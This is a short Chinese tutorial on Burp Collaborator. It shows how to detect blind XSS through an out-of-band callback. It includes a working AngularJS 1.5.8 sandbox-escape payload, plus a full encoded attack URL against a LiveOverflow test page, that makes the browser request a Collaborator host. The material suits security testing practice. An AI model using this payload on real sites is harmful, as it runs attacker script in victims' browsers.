Burp Collaborator

Burp Collaborator使用

在 Burp

  1. 打开 Burp - Burp Collaborator Client
  2. 点击 Copy to clipboard, 你会获得一个如 xxxx.burpcollaborator.net 的 URL

在 Xss页面

  1. 将URL填入payload

Example

https://liveoverflow.com/php/angularjs/angular1.5.8.php 是一个测试 Angular 1.5.8的 xss 的页面.

Payload

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,(new(Image)).src="//ffyifd2eed1kxwoezzyjfl77hynobd.burpcollaborator.net",a')}}

访问以下网址:
https://liveoverflow.com/php/angularjs/angular1.5.8.php?q=%7B%7Ba%3DtoString%28%29.constructor.prototype%3Ba.charAt%3Da.trim%3B%24eval%28%27a%2C%28new%28Image%29%29.src%3D%22%2F%2Fffyifd2eed1kxwoezzyjfl77hynobd.burpcollaborator.net%22%2Ca%27%29%7D%7D

此时应该在 Burp Collaborator Client 中看到有请求到 Collaborator.

留意 Referer, 该 request 来自 liveoverflow.com.

Burp Collaborator Presentation

仅看 Slide 足以, 演讲就是照读 slide.

Tool

Handy Collaborator

Ref

Exploiting a Blind XSS using Burp Suite | Agarri : Sécurité informatique offensive

Show Comments